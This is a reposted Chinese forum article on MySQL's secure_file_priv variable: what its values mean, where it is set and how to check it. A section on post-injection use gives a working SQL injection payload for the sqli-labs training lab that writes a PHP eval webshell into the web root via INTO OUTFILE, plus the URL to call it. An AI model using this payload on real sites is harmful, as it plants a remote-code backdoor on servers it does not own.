翼度科技»论坛 编程开发 mysql 查看内容

Mysql 中的secure_file_priv参数设置方法

8

主题

8

帖子

24

积分

新手上路

Rank: 1

积分
24
secure_file_priv是MySQL中的系统变量,用于限制文件的读取和写入。
该参数的设置可以通过my.ini(windows版本)/my.cnf(Linux版本)中设置。
修改完参数之后,必须重启数据库才能生效。
启动MySQL,先查看secure_file_priv的值。
命令:show variables like "secure%" 或  select @@secure_file_priv;

1.secure_file_priv = NULL ,限制文件的读取和写入。
2.secure_file_priv = 文件路径 ,限制文件的读取和写入只能在设定的文件夹中。
3.secure_file_priv= "", 对文件和读取和写入没有任何限制。
【MySQL漏洞注入后期】
1. select *** into dumpfile 文件路径;
内容在文件中是以一行的形式呈现,多行数据会出现数据保存不全;
  1. dumpfile
复制代码
只能写一行,并且输出中不存在任何格式。
2.select  *** into outfile  文件路径;
内容有特殊格式转换,该换行换行,较比dumpfile更加好用;
  1. outfile
复制代码
可以写入多行数据,并且字段和行终止符都可以作为格式输出。
例如:?id=1')) union select 1,"<?php eval($_REQUEST[123]) ?>",3 into outfile "C://phpStudy//WWW//sqli-labs-master//Less-7//test.php" -- +
调用:url/test.php?123=phpinfo();
3.select  *** load_file (下载文件)
select  load_file(文件路径);
到此这篇关于Mysql 中的secure_file_priv参数设置的文章就介绍到这了,更多相关mysql secure_file_priv参数设置内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

来源:https://www.jb51.net/database/330620nj4.htm
免责声明:由于采集信息均来自互联网,如果侵犯了您的权益,请联系我们【E-Mail:cb@itdo.tech】 我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x

举报 回复 使用道具